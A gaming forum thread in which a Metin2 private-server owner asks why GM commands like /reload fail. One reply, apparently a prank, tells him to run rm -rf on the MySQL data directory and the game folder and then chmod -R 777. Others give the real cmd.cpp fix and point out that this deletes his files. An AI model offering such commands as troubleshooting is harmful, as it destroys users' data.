Jump to content

Metin2 Problem Cmd


Recommended Posts

On 21/7/2016 at 2:38 PM, Mortal said:

Hey guys i have an problem. i load a Server Source for my server. and now i cant do every type of /reload and /i . 

I can do only /m /mm /group this kind and my  problem is i cant do ingame /reload q everything of reload and /i  when i type them is saying the command dosnt exist..... what i do?

I think your problem is in your files...

Try writing:

cd /var/db

rm -rf mysql

cd /usr/home

rm -rf game

then chmod -R 777 game

then chmod -R 777 mysql

  • Lmao 1
  • Love 2
Link to comment
Share on other sites

On 21/7/2016 at 2:38 PM, Mortal said:

Hey guys i have an problem. i load a Server Source for my server. and now i cant do every type of /reload and /i . 

I can do only /m /mm /group this kind and my  problem is i cant do ingame /reload q everything of reload and /i  when i type them is saying the command dosnt exist..... what i do?

Open cmd.cpp search for this function:
 

Spoiler

struct command_info cmd_info[] =

Be sure it have Reload like this:
 

Spoiler

{ "reload",        do_reload,        0,            POS_DEAD,    GM_IMPLEMENTOR    },

---------------------------------------------------------------------------------------------------------------------
 

 

2 hours ago, BeHappy4Ever said:

I think your problem is in your files...

Try writing:

cd /var/db

rm -rf mysql

cd /usr/home

rm -rf game

then chmod -R 777 game

then chmod -R 777 mysql

Wtf this will delete his files lel

Untitled.png

Link to comment
Share on other sites

14 hours ago, Law™ said:

Open cmd.cpp search for this function:
 

  Hide contents

struct command_info cmd_info[] =

Be sure it have Reload like this:
 

  Reveal hidden contents

{ "reload",        do_reload,        0,            POS_DEAD,    GM_IMPLEMENTOR    },

---------------------------------------------------------------------------------------------------------------------
 

 

Wtf this will delete his files lel

Its okay man ;p

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now

Announcements



×
×
  • Create New...

Important Information

Terms of Use / Privacy Policy / Guidelines / We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.